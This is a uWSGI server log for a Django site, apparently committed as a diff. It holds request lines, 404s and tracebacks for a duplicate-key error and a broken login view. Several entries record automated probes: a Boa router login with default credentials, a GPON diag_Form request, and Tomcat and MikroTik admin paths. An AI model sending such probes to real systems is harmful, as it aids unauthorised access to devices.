+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 148, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 310, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 548, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 775, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 1156, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 725, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/protocol.py", line 221, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/err.py", line 143, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'")
+[pid: 12823|app: 0|req: 926/1228] 219.228.146.225 () {48 vars in 960 bytes} [Tue Jan 12 05:43:12 2021] POST / => generated 208728 bytes in 56 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 927/1229] 219.228.146.225 () {48 vars in 960 bytes} [Tue Jan 12 05:43:14 2021] POST / => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 1)
+[pid: 12823|app: 0|req: 928/1230] 219.228.146.225 () {40 vars in 859 bytes} [Tue Jan 12 05:43:14 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 929/1231] 219.228.146.225 () {40 vars in 861 bytes} [Tue Jan 12 05:43:14 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 930/1232] 219.228.146.225 () {40 vars in 866 bytes} [Tue Jan 12 05:43:21 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[]
+[pid: 12823|app: 0|req: 931/1233] 219.228.146.225 () {40 vars in 874 bytes} [Tue Jan 12 05:43:28 2021] GET /all-1-0-0 => generated 8761 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1234] 219.228.146.225 () {38 vars in 824 bytes} [Tue Jan 12 05:43:28 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1235] 219.228.146.225 () {38 vars in 823 bytes} [Tue Jan 12 05:43:28 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+Not Found: /index.htm
+[pid: 12823|app: 0|req: 932/1236] 219.228.146.225 () {40 vars in 878 bytes} [Tue Jan 12 05:43:32 2021] GET /index.htm => generated 3391 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /index.htm
+[pid: 12823|app: 0|req: 933/1237] 219.228.146.225 () {40 vars in 878 bytes} [Tue Jan 12 05:43:37 2021] GET /index.htm => generated 3391 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 934/1238] 219.228.146.225 () {38 vars in 809 bytes} [Tue Jan 12 05:43:49 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[]
+[pid: 12823|app: 0|req: 935/1239] 61.151.178.177 () {32 vars in 573 bytes} [Tue Jan 12 05:53:38 2021] GET /all-1-0-0 => generated 8707 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1240] 61.151.178.177 () {34 vars in 652 bytes} [Tue Jan 12 05:53:58 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1241] 61.151.178.177 () {34 vars in 633 bytes} [Tue Jan 12 05:55:09 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1242] 61.151.178.177 () {34 vars in 650 bytes} [Tue Jan 12 05:55:29 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1243] 61.151.178.177 () {34 vars in 664 bytes} [Tue Jan 12 05:56:17 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1244] 61.151.178.177 () {34 vars in 685 bytes} [Tue Jan 12 05:56:58 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1245] 61.151.178.177 () {34 vars in 624 bytes} [Tue Jan 12 05:57:18 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: 0|req: 936/1246] 212.64.18.182 () {28 vars in 321 bytes} [Tue Jan 12 06:14:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /boaform/admin/formLogin
+[pid: 12823|app: 0|req: 937/1247] 183.15.122.106 () {22 vars in 313 bytes} [Tue Jan 12 06:16:40 2021] GET /boaform/admin/formLogin?username=ec8&psd=ec8 => generated 3459 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 938/1248] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 06:20:36 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 939/1249] 219.228.146.187 () {38 vars in 789 bytes} [Tue Jan 12 06:38:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 940/1250] 219.228.146.187 () {40 vars in 849 bytes} [Tue Jan 12 06:38:06 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 941/1251] 219.228.146.187 () {38 vars in 807 bytes} [Tue Jan 12 06:38:08 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 942/1252] 219.228.146.187 () {48 vars in 1011 bytes} [Tue Jan 12 06:38:23 2021] POST /my-admin/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 0)
+[pid: 12823|app: 0|req: 943/1253] 219.228.146.187 () {40 vars in 862 bytes} [Tue Jan 12 06:38:23 2021] GET /admin-home/ => generated 9586 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 944/1254] 219.228.146.187 () {38 vars in 872 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 945/1255] 219.228.146.187 () {38 vars in 876 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 946/1256] 219.228.146.187 () {38 vars in 840 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 947/1257] 219.228.146.187 () {38 vars in 884 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 948/1258] 219.228.146.187 () {38 vars in 860 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 949/1259] 219.228.146.187 () {38 vars in 916 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 950/1260] 219.228.146.187 () {38 vars in 808 bytes} [Tue Jan 12 06:38:23 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 951/1261] 219.228.146.187 () {38 vars in 806 bytes} [Tue Jan 12 06:38:23 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 952/1262] 219.228.146.187 () {38 vars in 860 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 953/1263] 219.228.146.187 () {40 vars in 868 bytes} [Tue Jan 12 06:38:26 2021] GET /announcement/ => generated 8250 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 954/1264] 219.228.146.187 () {38 vars in 874 bytes} [Tue Jan 12 06:38:26 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 955/1265] 219.228.146.187 () {38 vars in 878 bytes} [Tue Jan 12 06:38:26 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 956/1266] 219.228.146.187 () {38 vars in 886 bytes} [Tue Jan 12 06:38:26 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 957/1267] 219.228.146.187 () {38 vars in 842 bytes} [Tue Jan 12 06:38:26 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 958/1268] 219.228.146.187 () {38 vars in 862 bytes} [Tue Jan 12 06:38:27 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 959/1269] 219.228.146.187 () {38 vars in 862 bytes} [Tue Jan 12 06:38:27 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 960/1270] 219.228.146.187 () {38 vars in 918 bytes} [Tue Jan 12 06:38:27 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 961/1271] 219.228.146.187 () {38 vars in 810 bytes} [Tue Jan 12 06:38:27 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 962/1272] 219.228.146.187 () {38 vars in 808 bytes} [Tue Jan 12 06:38:27 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 963/1273] 219.228.146.187 () {40 vars in 868 bytes} [Tue Jan 12 06:38:27 2021] GET /kind-manage/ => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 964/1274] 219.228.146.187 () {38 vars in 877 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 965/1275] 219.228.146.187 () {38 vars in 841 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 966/1276] 219.228.146.187 () {38 vars in 885 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 967/1277] 219.228.146.187 () {38 vars in 873 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 968/1278] 219.228.146.187 () {38 vars in 861 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 969/1279] 219.228.146.187 () {38 vars in 917 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 970/1280] 219.228.146.187 () {38 vars in 809 bytes} [Tue Jan 12 06:38:28 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 971/1281] 219.228.146.187 () {38 vars in 807 bytes} [Tue Jan 12 06:38:28 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 972/1282] 219.228.146.187 () {38 vars in 861 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 973/1283] 219.228.146.187 () {38 vars in 807 bytes} [Tue Jan 12 06:38:34 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 974/1284] 219.228.146.187 () {40 vars in 850 bytes} [Tue Jan 12 06:38:35 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 975/1285] 219.228.146.187 () {40 vars in 852 bytes} [Tue Jan 12 06:38:35 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 976/1286] 219.228.146.187 () {48 vars in 1002 bytes} [Tue Jan 12 06:38:54 2021] POST /login/ => generated 82 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 977/1287] 219.228.146.187 () {48 vars in 1002 bytes} [Tue Jan 12 06:39:07 2021] POST /login/ => generated 27 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 978/1288] 219.228.146.187 () {40 vars in 847 bytes} [Tue Jan 12 06:39:07 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 979/1289] 66.240.205.34 () {30 vars in 479 bytes} [Tue Jan 12 06:45:06 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /robots.txt
+[pid: 12823|app: 0|req: 980/1290] 66.240.205.34 () {26 vars in 308 bytes} [Tue Jan 12 06:45:08 2021] GET /robots.txt => generated 3394 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /sitemap.xml
+[pid: 12823|app: 0|req: 981/1291] 66.240.205.34 () {26 vars in 310 bytes} [Tue Jan 12 06:45:11 2021] GET /sitemap.xml => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /.well-known/security.txt
+[pid: 12823|app: 0|req: 982/1292] 66.240.205.34 () {26 vars in 336 bytes} [Tue Jan 12 06:45:16 2021] GET /.well-known/security.txt => generated 3436 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1293] 66.240.205.34 () {32 vars in 485 bytes} [Tue Jan 12 06:45:18 2021] GET /static/img/favicon.ico => generated 1150 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 983/1294] 35.187.190.226 () {38 vars in 512 bytes} [Tue Jan 12 06:45:23 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 984/1295] 101.89.29.78 () {32 vars in 604 bytes} [Tue Jan 12 06:48:49 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 985/1296] 101.227.139.164 () {32 vars in 565 bytes} [Tue Jan 12 06:49:01 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 986/1297] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 07:09:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 12823|app: 0|req: 987/1298] 83.97.20.21 () {22 vars in 227 bytes} [Tue Jan 12 07:09:26 2021] OPTIONS / => generated 52541 bytes in 21 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0)
+[uwsgi-http key: VM-0-13-centos client_addr: 83.97.20.21 client_port: 38898] hr_write(): Broken pipe [plugins/http/http.c line 565]
+Not Found: /http:/nginx.korsangazi.com/scan.html
+[pid: 12823|app: 0|req: 988/1299] 95.214.53.156 () {26 vars in 354 bytes} [Tue Jan 12 07:18:22 2021] GET http://nginx.korsangazi.com/scan.html => generated 1728 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 989/1300] 83.97.20.34 () {26 vars in 277 bytes} [Tue Jan 12 07:43:24 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 990/1301] 114.33.121.193 () {36 vars in 500 bytes} [Tue Jan 12 07:51:49 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1302] 113.96.198.50 () {28 vars in 352 bytes} [Tue Jan 12 07:59:56 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 991/1303] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 08:00:32 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 992/1304] 83.97.20.34 () {26 vars in 278 bytes} [Tue Jan 12 08:37:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 993/1305] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 08:43:27 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 994/1306] 128.14.134.134 () {30 vars in 438 bytes} [Tue Jan 12 09:23:18 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /webfig/
+[pid: 12823|app: 0|req: 995/1307] 128.14.134.134 () {30 vars in 452 bytes} [Tue Jan 12 09:23:19 2021] GET /webfig/ => generated 3385 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 996/1308] 83.97.20.21 () {26 vars in 277 bytes} [Tue Jan 12 09:30:57 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 997/1309] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 10:14:43 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /GponForm/diag_Form
+[pid: 12823|app: 0|req: 998/1310] 222.247.200.187 () {34 vars in 442 bytes} [Tue Jan 12 10:22:59 2021] POST /GponForm/diag_Form?images/ => generated 3423 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 999/1311] 103.126.6.96 () {22 vars in 234 bytes} [Tue Jan 12 10:31:15 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+Not Found: /manager/html
+[pid: 12823|app: 0|req: 1000/1312] 103.126.6.96 () {24 vars in 300 bytes} [Tue Jan 12 10:31:16 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1001/1313] 196.52.43.60 () {26 vars in 377 bytes} [Tue Jan 12 10:45:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1002/1314] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 10:53:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1003/1315] 83.97.20.21 () {26 vars in 277 bytes} [Tue Jan 12 11:41:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1004/1316] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 11:41:48 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1005/1317] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 12:28:32 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1006/1318] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 12:28:45 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 12823|app: 0|req: 1007/1319] 83.97.20.21 () {22 vars in 227 bytes} [Tue Jan 12 12:29:01 2021] OPTIONS / => generated 52541 bytes in 21 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1008/1320] 219.228.146.150 () {36 vars in 614 bytes} [Tue Jan 12 13:00:11 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1321] 219.228.146.150 () {38 vars in 715 bytes} [Tue Jan 12 13:00:11 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1322] 219.228.146.150 () {38 vars in 713 bytes} [Tue Jan 12 13:00:11 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1323] 219.228.146.150 () {38 vars in 735 bytes} [Tue Jan 12 13:00:11 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
